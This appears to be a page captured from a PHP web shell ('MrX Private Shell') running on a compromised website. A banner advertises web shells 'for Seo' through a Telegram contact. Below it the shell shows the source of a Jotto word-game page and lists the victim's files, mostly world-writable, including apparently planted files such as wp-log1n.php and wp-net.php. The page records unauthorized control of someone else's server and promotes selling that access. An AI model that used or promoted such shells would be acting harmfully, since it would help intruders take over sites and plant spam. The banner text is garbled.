__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?PHP $master_word = "paean" ; include_once "business_logic.php" ; $request = sanitizeRequest($_REQUEST); session_start(); $g = new Game(); $p = $g->getPlayer( $request ); $outcome = $g->wrapper($request); $history = $g->displayHistory($p, TRUE); /* echo "<br>"; print_r ($history) ; echo "<br>"; */ // NOT USING THIS AT THIS POINT! // $alphabet = $g->displayAlphabet($p); ?> <head> <link rel="stylesheet" type="text/css" href="jotto.css"> <script src="jotto.js"></script> </head> <body> <div id="container"> <!-- REINSTATE SOON <button id="rules_cta" onclick="rules_modal()">[?]</button & KILL BR --><br> <!-- div id="title_header"> jotto </div --> <div id="wrapper"> <div id="col1" class="col"> <form id="guess" action= "singleplayer.php" method="post"> Guess: <input id="guess_textbox" autofocus="autofocus" type="text" name="guess"><br> <input id="guess_submit" type="submit" value="Guess"> </form> </div> <div id="col2" class="col"> <form id="reset_alphabet" action="singleplayer.php" method="post"> <input type="hidden" name="resetalphabet" value="1"><br> <input type="submit" value="Reset Alphabet"> </form> </div> <div id="col3" class="col"> <form id="resign" action="singleplayer.php" method="post"> <input type="hidden" name="resign" value="1"><br> <input type="submit" value="Give Up"> </form> </div> </div> <div id="phps"> <!-- HOLDING OFF DEALING with alphabet til later! --> <!-- span id="alphabet"> <@?@PHP foreach ($alphabet as $letter => $status) { ?@> <a href='singleplayer.php?letter=<@?@PHP echo $letter; ?@>'><span class='<@?@PHP echo $status; ?@>'><@?@PHP echo $letter; ?@></span></a> <@?@PHP } ?@> </span --> <?PHP if (count($history) > 0) { /* echo "<br>"; print_r ($history) ; echo "<br>"; */ ?> <div class="history_wrapper"> <?PHP foreach ($history as $i => $hval) { ?> <span id="history_list_'<?PHP echo $i; ?>" class="history_list"> <?PHP foreach (range(0, 4) as $j) { ?> <span class="<?PHP echo $hval['status'][$j];?>"><?PHP echo $hval['letter'][$j];?></span> <?PHP } ?> </span> <!-- This, below, is where the total correct # is printed out in red! --> <span class="history_correct"> <?PHP echo $hval['correct'];?> </span> <br/> <?PHP } ?> </div> <?PHP } ?> <?PHP /* if ( ! empty($outcome)) { echo $outcome; echo '<br/>'; } */ ?> <span id="last_turn"> <?PHP echo $g->lastTurn($p); ?> </span> <br/> <br/> </div> <div id="rules_modal"> <div class="transparency_cover"></div> <div id="rules_explanation"> <div id="rules_header"> <span id="close_modal" onclick="rules_modal()"> [X] </span> Rules </div> <div id="overflow_container"> <span id="rules_text"> There is a secret word you must guess. The word is 5 letters long and is in American English.<br/><br/> In order to guess this word, you must submit words and you will be told how many letters in the secret word are present in the word that you guessed. Repeated letters are permitted.<br/><br/> You may click the letters on the alphabet to keep track of what letters may be present in the secret word. black means you don't know whether it is present; <span class="absent">grey and struck-through</span> means you know it is absent; <span class="present">red</span> means you know it is present.<br/><br/> Good luck! </span> </div> </div> </div> <div> </body>
Name | Type | Size | Permission | Actions |
---|---|---|---|---|
001c8 | Folder | 0555 |
|
|
481d44 | Folder | 0777 |
|
|
wp-includes | Folder | 0777 |
|
|
.htaccess | File | 1.13 KB | 0555 |
|
12-5-25 | File | 0 B | 0777 |
|
Killings.epub | File | 1.04 MB | 0777 |
|
LICENSE | File | 0 B | 0777 |
|
README.md | File | 689 B | 0777 |
|
Transact.jpg | File | 36.75 KB | 0777 |
|
Your-Questions.png | File | 88.03 KB | 0777 |
|
android-chrome-192x192.png | File | 27.12 KB | 0777 |
|
android-chrome-512x512.png | File | 126.26 KB | 0777 |
|
apple-touch-icon.png | File | 24.3 KB | 0777 |
|
atom-favicon.png | File | 2.11 KB | 0777 |
|
business_logic.php | File | 15.5 KB | 0777 |
|
buy-it.png | File | 10.29 KB | 0777 |
|
credit.jpg | File | 98.85 KB | 0777 |
|
dollar.png | File | 38.13 KB | 0777 |
|
favicon-16x16.png | File | 526 B | 0777 |
|
favicon-32x32.png | File | 1.37 KB | 0777 |
|
favicon.ico | File | 15.04 KB | 0777 |
|
google03c94fb2481267d6.html | File | 53 B | 0644 |
|
google12cf5d409d619b62.html | File | 53 B | 0777 |
|
guessable.txt | File | 58.82 KB | 0777 |
|
index.php | File | 13.71 KB | 0555 |
|
index.php0 | File | 1.35 KB | 0777 |
|
index2.php | File | 3.76 KB | 0777 |
|
inters.php | File | 392 B | 0777 |
|
networks.php | File | 1.87 KB | 0777 |
|
robomain.jpg | File | 37.04 KB | 0777 |
|
robots.txt | File | 426 B | 0777 |
|
search.php | File | 1.46 KB | 0777 |
|
singleplayer.php | File | 3.91 KB | 0777 |
|
site.webmanifest | File | 263 B | 0777 |
|
style3.css | File | 512.06 KB | 0777 |
|
tmc.jpg | File | 302.63 KB | 0777 |
|
vert-line.jpg | File | 950 B | 0777 |
|
words.txt | File | 19.38 KB | 0777 |
|
wp-log1n.php | File | 1.93 KB | 0777 |
|
wp-net.php | File | 706 B | 0777 |
|